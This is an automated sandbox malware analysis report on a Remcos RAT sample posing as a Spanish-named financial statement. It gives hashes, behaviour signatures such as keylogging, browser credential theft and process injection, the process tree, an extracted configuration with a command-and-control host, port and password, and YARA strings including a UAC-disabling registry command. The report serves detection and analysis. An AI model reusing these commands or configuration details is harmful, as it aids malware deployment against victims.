Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report EXTRACTOSERFINANZA989543704031499704092798964.exe

Overview

General Information

Sample Name:EXTRACTOSERFINANZA989543704031499704092798964.exe
Analysis ID:399743
MD5:2e91e5e3d39ce4155edad4f2a3acf916
SHA1:58adf5d60d9da823a4fd62282c0c46134e20e47b
SHA256:eb9e13fd092522e4dde08e96961117f9926e3ef70ca3b225f8c388e476541a21
Tags:exeRATRemcosRAT
Infos:

Most interesting Screenshot:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Yara detected Remcos RAT
.NET source code contains very large strings
C2 URLs / IPs found in malware configuration
Contains functionality to capture and log keystrokes
Contains functionality to hide a thread from the debugger
Contains functionality to inject code into remote processes
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Country aware sample found (crashes after keyboard check)
Hides threads from debuggers
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to detect virtual machines (SGDT)
Contains functionality to detect virtual machines (SMSW)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara signature match

Classification

Startup

  • System is w10x64
  • EXTRACTOSERFINANZA989543704031499704092798964.exe (PID: 6880 cmdline: 'C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe' MD5: 2E91E5E3D39CE4155EDAD4F2A3ACF916)
    • cmd.exe (PID: 7128 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 7136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 6168 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • EXTRACTOSERFINANZA989543704031499704092798964.exe (PID: 6292 cmdline: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe MD5: 2E91E5E3D39CE4155EDAD4F2A3ACF916)
      • wscript.exe (PID: 6548 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
        • cmd.exe (PID: 3400 cmdline: 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • PxxoServicesTrialNet1.exe (PID: 5772 cmdline: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe MD5: 2E91E5E3D39CE4155EDAD4F2A3ACF916)
            • cmd.exe (PID: 7004 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 6968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • timeout.exe (PID: 7056 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
            • PxxoServicesTrialNet1.exe (PID: 7068 cmdline: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe MD5: 2E91E5E3D39CE4155EDAD4F2A3ACF916)
            • PxxoServicesTrialNet1.exe (PID: 4480 cmdline: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe MD5: 2E91E5E3D39CE4155EDAD4F2A3ACF916)
            • WerFault.exe (PID: 6388 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5772 -s 1448 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 1000 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6880 -s 1496 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • PxxoServicesTrialNet1.exe (PID: 6648 cmdline: 'C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe' MD5: 2E91E5E3D39CE4155EDAD4F2A3ACF916)
    • cmd.exe (PID: 5048 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 1368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 1444 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • PxxoServicesTrialNet1.exe (PID: 6360 cmdline: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe MD5: 2E91E5E3D39CE4155EDAD4F2A3ACF916)
    • PxxoServicesTrialNet1.exe (PID: 6788 cmdline: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe MD5: 2E91E5E3D39CE4155EDAD4F2A3ACF916)
    • WerFault.exe (PID: 6596 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6648 -s 1476 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • PxxoServicesTrialNet1.exe (PID: 7144 cmdline: 'C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe' MD5: 2E91E5E3D39CE4155EDAD4F2A3ACF916)
    • cmd.exe (PID: 2240 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 6224 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • cleanup

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "databasepropersonombrecomercialideasearchwords.services:3521:uuo-qp", "Assigned name": "ArtilleriaRestore", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "PxxoServicesTrialNet1.exe", "Startup value": "MservicesOrg2", "Hide file": "Enable", "Mutex": "RemcosX2-Y057I8", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "xlogs171.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "wikipedia;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "System32", "Keylog folder": "Runtime12", "Keylog file max size": "10000"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmpRemcos_1Remcos Payloadkevoreilly
    • 0x16510:$name: Remcos
    • 0x16888:$name: Remcos
    • 0x16de0:$name: Remcos
    • 0x16e33:$name: Remcos
    • 0x15674:$time: %02i:%02i:%02i:%03i
    • 0x156fc:$time: %02i:%02i:%02i:%03i
    • 0x16be4:$time: %02i:%02i:%02i:%03i
    • 0x3074:$crypto: 0F B6 D0 8B 45 08 89 16 8D 34 07 8B 01 03 C2 8B CB 99 F7 F9 8A 84 95 F8 FB FF FF 30 06 47 3B 7D ...
    00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmpREMCOS_RAT_variantsunknownunknown
    • 0x166f8:$str_a1: C:\Windows\System32\cmd.exe
    • 0x16714:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x16714:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x15dfc:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
    • 0x16400:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
    • 0x159e0:$str_b2: Executing file:
    • 0x16798:$str_b3: GetDirectListeningPort
    • 0x16240:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
    • 0x16534:$str_b5: licence_code.txt
    • 0x1649c:$str_b6: \restart.vbs
    • 0x163c0:$str_b8: \uninstall.vbs
    • 0x1596c:$str_b9: Downloaded file:
    • 0x15998:$str_b10: Downloading file:
    • 0x15690:$str_b11: KeepAlive Enabled! Timeout: %i seconds
    • 0x159fc:$str_b12: Failed to upload file:
    • 0x167d8:$str_b13: StartForward
    • 0x167bc:$str_b14: StopForward
    • 0x16330:$str_b15: fso.DeleteFile "
    • 0x16394:$str_b16: On Error Resume Next
    • 0x162fc:$str_b17: fso.DeleteFolder "
    • 0x15a14:$str_b18: Uploaded file:
    00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmpRemcos_1Remcos Payloadkevoreilly
      • 0x16510:$name: Remcos
      • 0x16888:$name: Remcos
      • 0x16de0:$name: Remcos
      • 0x16e33:$name: Remcos
      • 0x15674:$time: %02i:%02i:%02i:%03i
      • 0x156fc:$time: %02i:%02i:%02i:%03i
      • 0x16be4:$time: %02i:%02i:%02i:%03i
      • 0x3074:$crypto: 0F B6 D0 8B 45 08 89 16 8D 34 07 8B 01 03 C2 8B CB 99 F7 F9 8A 84 95 F8 FB FF FF 30 06 47 3B 7D ...
      Click to see the 17 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      33.2.PxxoServicesTrialNet1.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
        33.2.PxxoServicesTrialNet1.exe.400000.0.raw.unpackRemcos_1Remcos Payloadkevoreilly
        • 0x16510:$name: Remcos
        • 0x16888:$name: Remcos
        • 0x16de0:$name: Remcos
        • 0x16e33:$name: Remcos
        • 0x15674:$time: %02i:%02i:%02i:%03i
        • 0x156fc:$time: %02i:%02i:%02i:%03i
        • 0x16be4:$time: %02i:%02i:%02i:%03i
        • 0x3074:$crypto: 0F B6 D0 8B 45 08 89 16 8D 34 07 8B 01 03 C2 8B CB 99 F7 F9 8A 84 95 F8 FB FF FF 30 06 47 3B 7D ...
        33.2.PxxoServicesTrialNet1.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
        • 0x166f8:$str_a1: C:\Windows\System32\cmd.exe
        • 0x16714:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x16714:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x15dfc:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x16400:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x159e0:$str_b2: Executing file:
        • 0x16798:$str_b3: GetDirectListeningPort
        • 0x16240:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x16534:$str_b5: licence_code.txt
        • 0x1649c:$str_b6: \restart.vbs
        • 0x163c0:$str_b8: \uninstall.vbs
        • 0x1596c:$str_b9: Downloaded file:
        • 0x15998:$str_b10: Downloading file:
        • 0x15690:$str_b11: KeepAlive Enabled! Timeout: %i seconds
        • 0x159fc:$str_b12: Failed to upload file:
        • 0x167d8:$str_b13: StartForward
        • 0x167bc:$str_b14: StopForward
        • 0x16330:$str_b15: fso.DeleteFile "
        • 0x16394:$str_b16: On Error Resume Next
        • 0x162fc:$str_b17: fso.DeleteFolder "
        • 0x15a14:$str_b18: Uploaded file:
        16.2.PxxoServicesTrialNet1.exe.49ce510.5.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
          16.2.PxxoServicesTrialNet1.exe.49ce510.5.raw.unpackRemcos_1Remcos Payloadkevoreilly
          • 0x16510:$name: Remcos
          • 0x16888:$name: Remcos
          • 0x16de0:$name: Remcos
          • 0x16e33:$name: Remcos
          • 0x15674:$time: %02i:%02i:%02i:%03i
          • 0x156fc:$time: %02i:%02i:%02i:%03i
          • 0x16be4:$time: %02i:%02i:%02i:%03i
          • 0x3074:$crypto: 0F B6 D0 8B 45 08 89 16 8D 34 07 8B 01 03 C2 8B CB 99 F7 F9 8A 84 95 F8 FB FF FF 30 06 47 3B 7D ...
          Click to see the 57 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: RemcosShow sources
          Source: Registry Key setAuthor: Joe Security: Data: Details: ED 7B 37 DF 39 55 50 9B 55 9D 08 40 1D 41 4B D4 20 95 6C A2 D8 29 76 33 44 E7 95 ED A9 D3 02 30 B2 4C 86 FC 4B 2B 1E CE 8D AD 65 88 FB 0D AA 8F 2D 8F 33 21 AE D3 AD B9 0A A8 65 CD 72 78 4C C3 D1 F4 FB 00 C2 E7 08 86 C1 A6 B8 B7 D6 9E 3B 53 3D 90 59 1A CE 08 A5 CA 19 1A 22 2B 9A D8 22 36 6C 1E 09 FF 2B FD A7 DE 30 09 87 13 9D AD 22 F5 39 10 6B 62 68 CE 98 57 45 C7 2A 6F 32 DC 6F 74 14 85 F1 CF , EventID: 13, Image: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe, ProcessId: 4480, TargetObject: HKEY_CURRENT_USER\Software\RemcosX2-Y057I8\exepath

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 24.2.PxxoServicesTrialNet1.exe.3c85f68.3.raw.unpackMalware Configuration Extractor: Remcos {"Host:Port:Password": "databasepropersonombrecomercialideasearchwords.services:3521:uuo-qp", "Assigned name": "ArtilleriaRestore", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "PxxoServicesTrialNet1.exe", "Startup value": "MservicesOrg2", "Hide file": "Enable", "Mutex": "RemcosX2-Y057I8", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "xlogs171.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "wikipedia;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "System32", "Keylog folder": "Runtime12", "Keylog file max size": "10000"}
          Multi AV Scanner detection for domain / URLShow sources
          Source: databasepropersonombrecomercialideasearchwords.servicesVirustotal: Detection: 12%Perma Link
          Source: databasepropersonombrecomercialideasearchwords.servicesVirustotal: Detection: 12%Perma Link
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeReversingLabs: Detection: 10%
          Multi AV Scanner detection for submitted fileShow sources
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exeReversingLabs: Detection: 10%
          Yara detected Remcos RATShow sources
          Source: Yara matchFile source: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.780636700.0000000003E8B000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.710784907.0000000004374000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.706118629.0000000003969000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.781443613.00000000049AD000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.771805512.000000000559E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.752626728.0000000003279000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000002.728536035.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.766450964.0000000002DE1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.759339292.0000000003C85000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: PxxoServicesTrialNet1.exe PID: 4480, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: PxxoServicesTrialNet1.exe PID: 7144, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: PxxoServicesTrialNet1.exe PID: 5772, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: EXTRACTOSERFINANZA989543704031499704092798964.exe PID: 6880, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: PxxoServicesTrialNet1.exe PID: 6788, type: MEMORY
          Source: Yara matchFile source: 33.2.PxxoServicesTrialNet1.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.PxxoServicesTrialNet1.exe.49ce510.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.2.PxxoServicesTrialNet1.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.2.PxxoServicesTrialNet1.exe.3ca6f88.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.2.PxxoServicesTrialNet1.exe.3ca6f88.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.2.PxxoServicesTrialNet1.exe.3c85f68.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.PxxoServicesTrialNet1.exe.55bf940.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.PxxoServicesTrialNet1.exe.559e920.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.PxxoServicesTrialNet1.exe.49ce510.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 33.2.PxxoServicesTrialNet1.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.2.PxxoServicesTrialNet1.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4395598.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.PxxoServicesTrialNet1.exe.55bf940.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4374578.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.PxxoServicesTrialNet1.exe.559e920.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.PxxoServicesTrialNet1.exe.49ad4f0.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.2.PxxoServicesTrialNet1.exe.3c85f68.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4395598.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.PxxoServicesTrialNet1.exe.49ad4f0.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4374578.5.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeJoe Sandbox ML: detected
          Machine Learning detection for sampleShow sources
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exeJoe Sandbox ML: detected
          Source: 24.2.PxxoServicesTrialNet1.exe.3ca6f88.4.unpackAvira: Label: BDS/Backdoor.Gen
          Source: 7.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
          Source: 15.2.PxxoServicesTrialNet1.exe.559e920.4.unpackAvira: Label: BDS/Backdoor.Gen
          Source: 16.2.PxxoServicesTrialNet1.exe.49ce510.5.unpackAvira: Label: BDS/Backdoor.Gen
          Source: 33.2.PxxoServicesTrialNet1.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
          Source: 15.2.PxxoServicesTrialNet1.exe.55bf940.3.unpackAvira: Label: BDS/Backdoor.Gen
          Source: 25.2.PxxoServicesTrialNet1.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
          Source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4395598.4.unpackAvira: Label: BDS/Backdoor.Gen
          Source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4374578.5.unpackAvira: Label: BDS/Backdoor.Gen
          Source: 16.2.PxxoServicesTrialNet1.exe.49ad4f0.6.unpackAvira: Label: BDS/Backdoor.Gen
          Source: 24.2.PxxoServicesTrialNet1.exe.3c85f68.3.unpackAvira: Label: BDS/Backdoor.Gen
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765912392.0000000001282000.00000004.00000020.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdbH{ source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765912392.0000000001282000.00000004.00000020.sdmp
          Source: Binary string: System.ni.pdb% source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: cfgmgr32.pdb% source: WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: System.ni.pdb" source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734788443.0000000004AD5000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 0000000C.00000002.697878831.00000000053F0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701319384.00000000014AB000.00000004.00000020.sdmp, PxxoServicesTrialNet1.exe, 0000000F.00000002.765912392.0000000001282000.00000004.00000020.sdmp
          Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000C.00000003.681869437.00000000051A1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.721117453.000000000458B000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.733685179.0000000004F2D000.00000004.00000001.sdmp
          Source: Binary string: PxxoServicesTrialNet1.PDB source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765005138.0000000000EF8000.00000004.00000001.sdmp, PxxoServicesTrialNet1.exe, 00000010.00000002.775167654.0000000001538000.00000004.00000001.sdmp
          Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: onfiguration.ni.pdb source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000C.00000003.681925394.00000000052D0000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.735005331.0000000004AC0000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746862935.0000000002DE5000.00000004.00000040.sdmp
          Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000C.00000003.681869437.00000000051A1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734900230.0000000004AF1000.00000004.00000001.sdmp
          Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000C.00000003.681869437.00000000051A1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734900230.0000000004AF1000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000C.00000003.681869437.00000000051A1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734900230.0000000004AF1000.00000004.00000001.sdmp
          Source: Binary string: ml.pdb source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: .ni.pdb source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: clr.pdb source: WerFault.exe, 0000000C.00000003.681925394.00000000052D0000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.735005331.0000000004AC0000.00000004.00000040.sdmp
          Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: System.pdb99zz source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp
          Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000C.00000003.681869437.00000000051A1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734900230.0000000004AF1000.00000004.00000001.sdmp
          Source: Binary string: profapi.pdb> source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp
          Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000C.00000003.681869437.00000000051A1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734900230.0000000004AF1000.00000004.00000001.sdmp
          Source: Binary string: System.Configuration.ni.pdb" source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734788443.0000000004AD5000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
